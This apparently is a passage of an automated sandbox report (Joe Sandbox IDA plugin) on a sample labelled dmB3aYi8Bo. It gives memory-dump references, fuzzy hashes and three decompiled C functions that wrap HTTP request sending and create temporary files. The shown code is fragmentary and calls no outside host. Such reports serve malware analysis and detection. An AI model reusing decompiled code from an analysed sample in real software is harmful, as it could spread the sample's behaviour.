    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: HttpRequest$HeadersSend
    • String ID: (
    • API String ID: 2674042921-3887548279
    • Opcode ID: 24740ef1dbefbbfa7ca85bc29be6bf0a50a33bd861a7f29932b4f46600be1c36
    • Instruction ID: ed0021f9b64e6a787d5dd013b8385f287baf7898d05e0e42ab02169c19daf333
    • Opcode Fuzzy Hash: 24740ef1dbefbbfa7ca85bc29be6bf0a50a33bd861a7f29932b4f46600be1c36
    • Instruction Fuzzy Hash: C9111371C1020EEBDF119FA4E848BED7BB5BF08325F488115EA12750A0D77996AACF64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012D1480(void* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, long _a16, long _a20) {
    				char _v20;
    				char _v24;
    				long _v32;
    				WCHAR* _v36;
    				char _v44;
    				intOrPtr _v48;
    				void* _t42;
    
    				if((L012B150A() & 0x000000ff) == 0) {
    					L9:
    					return HttpSendRequestExW(_a4, _a8, _a12, _a16, _a20);
    				}
    				_t44 = _a8;
    				if(_a8 != 0) {
    					L012B1947( &_v44, _a8, 0x28);
    					__eflags = _v32;
    					if(__eflags != 0) {
    						__eflags = _v36;
    						if(__eflags != 0) {
    							HttpAddRequestHeadersW(_a4, _v36, _v32, 0xa0000000);
    							_v36 = _v36 & 0x00000000;
    							_t13 =  &_v32;
    							 *_t13 = _v32 & 0x00000000;
    							__eflags =  *_t13;
    						}
    					}
    				} else {
    					_t42 = 0x28;
    					L012B19F6( &_v44, _t42);
    					_v44 = 0x28;
    				}
    				_v48 = E012D0CDB(_a4,  &_v24, _t44,  &_v20);
    				if(_v48 == 0xffffffff) {
    					_a8 =  &_v44;
    					goto L9;
    				} else {
    					return _v48;
    				}
    			}











    APIs
    • HttpAddRequestHeadersW.WININET(?,00000000,00000000,A0000000), ref: 012D14D4
    • HttpSendRequestExW.WININET(?,?,?,?,?), ref: 012D1514
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: HttpRequest$HeadersSend
    • String ID: (
    • API String ID: 2674042921-3887548279
    • Opcode ID: bd74803e76b06f9a87c464aa639df6e94bf56b1c4d865ffd199008bf976beabb
    • Instruction ID: ecd099656808c2fe2e99af7d20904f5668ba1c414791e5a74ceab1a394e888fb
    • Opcode Fuzzy Hash: bd74803e76b06f9a87c464aa639df6e94bf56b1c4d865ffd199008bf976beabb
    • Instruction Fuzzy Hash: 7011F83181020EEBDF129FA4D848BEE7BB5FF08325F04C115EA12751A0D77895A6DF64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012BC695(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				short _v524;
    				void* __esi;
    				WCHAR* _t16;
    				intOrPtr _t25;
    				int _t27;
    
    				_t27 = 0;
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) != 0 && L012B1640( &_v524) != 0) {
    					_t16 = PathFindFileNameW( &_v524);
    					_t25 = _a4;
    					E012BA5D0(_a8 + 0xfffffffd | 0xffffffff, _t16, _t25 + 3, 0, _a8 + 0xfffffffd);
    					L012B1947(_t25, "?T", 2);
    					 *((char*)(_t25 + 2)) = 0x5c;
    					_t27 = 1;
    				}
    				return _t27;
    			}








    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 012BC6B7
    • PathFindFileNameW.SHLWAPI(?), ref: 012BC6D8
      • Part of subcall function 012BA5D0: WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 012BA5EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: FileName$ByteCharFindMultiPathTempWide
    • String ID: cab
    • API String ID: 463298389-1787492089
    • Opcode ID: 7a5a193569c7f68704403b59e17a7fdbb3cf7993af7e928aafea02ce6f66bf13
    • Instruction ID: e3a72118b6c76986ab0b5de52fc61b406c9f175ef4d8d3d602f6a453b0b7d29c
    • Opcode Fuzzy Hash: 7a5a193569c7f68704403b59e17a7fdbb3cf7993af7e928aafea02ce6f66bf13
    • Instruction Fuzzy Hash: 7701F932A0021567DB209A68DC4EFDB7BACAF057A0F044351BA65E71C1DB70E94487D0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B975A(WCHAR* __ecx, WCHAR* __edx) {
    				short _v524;
    				WCHAR* _t12;
    				WCHAR* _t13;
    
    				_t12 = __edx;
    				_t13 = __ecx;
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L5:
    					return 0;
    				}
    				if(_t13 == 0) {
    					_t13 = L"tmp";
    				}
    				if(GetTempFileNameW( &_v524, _t13, 0, _t12) == 0) {
    					goto L5;
    				} else {
    					return 1;
    				}
    			}






    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 012B9775
    • GetTempFileNameW.KERNEL32(?,?,00000000), ref: 012B9797
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Temp$FileNamePath
    • String ID: tmp
    • API String ID: 3285503233-753892680
    • Opcode ID: 28f19701bf76496a817c765013dbc0fe72ea70078c564e62ae466a671d638afb
    • Instruction ID: 1d609d6d7cf257b71e6c18b47f9043d2bf92c6f4519376bc111f20ae24ee42e4
    • Opcode Fuzzy Hash: 28f19701bf76496a817c765013dbc0fe72ea70078c564e62ae466a671d638afb
    • Instruction Fuzzy Hash: 09E0EDF6D5022523EF341A29AC8EFEB37AC9BC1795F000171AF25E7185E821D8809BA0
    Uniqueness

    Uniqueness Score: -1.00%